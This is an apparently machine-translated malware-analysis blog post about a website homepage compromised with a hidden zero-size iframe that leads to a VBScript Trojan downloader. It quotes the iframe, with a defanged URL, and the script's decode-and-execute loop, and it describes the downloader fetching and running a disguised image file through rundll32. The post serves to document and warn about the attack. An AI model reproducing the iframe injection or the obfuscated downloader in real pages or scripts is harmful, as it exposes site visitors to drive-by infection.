EndurerOriginal
Version 1st
The website homepage contains code:
/---
<IFRAME src = "hxxp: // 2007. Ads *** 3721.com/000002000000000000000000001.htm" width = "0" Height = "0"> </iframe>
---/
Hxxp: // 2007. Ads ***** 3721.com/03862366%0%%%%1.htm
Kaspersky reportsTrojan-Downloader.VBS.Small.dvWhich contains the VBScript program. The function is to decrypt the value of variable A and execute it.
The related code is:
/---
D = "execute": c = "& CHR (& H": N = ")": Do While Len (a)> 1: D = D & C & left (A, 2) & "-2" & N: B = A: A = mid (B, 3): loop: Execute d
---/
Repeat the decryption process five times to obtain a VBScript program. The function is to use Microsoft. XMLHTTP and
SCR implements pting. fileSystemObject downloads the boy.jpg file, saves it as % Temp %/h1.bmp, and uses shell. run the ShellExecute method of application object Q: "rundll32.exe", % Temp %/h1.bmp, "", "open", 0
File Description: D:/test/boy.jpg
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:43:41
Modification time: 12:44:34
Access time: 12:45:19
Size: 42856 bytes, 41.872 KB
MD5: 845989a7edc5527a88e0cb917525171e
Use nspack 1.3-> North Star/Liu Xing to ping the shell.
Kaspersky reportsTrojan. win32.agent. AAC
Postscript:
Yesterday, we found a program called cmd.exe to run:
We found a website that spread Weijin/worm. win32.viking. If, with novel technologies.
Http://endurer.bokee.com/6147701.html
Http://blog.sina.com/u/49926d91010007ur
Http://blog.i0778.com /? 1314/action_viewspace_itemid_00003.html
Today, we have another call to run rundll32.exe.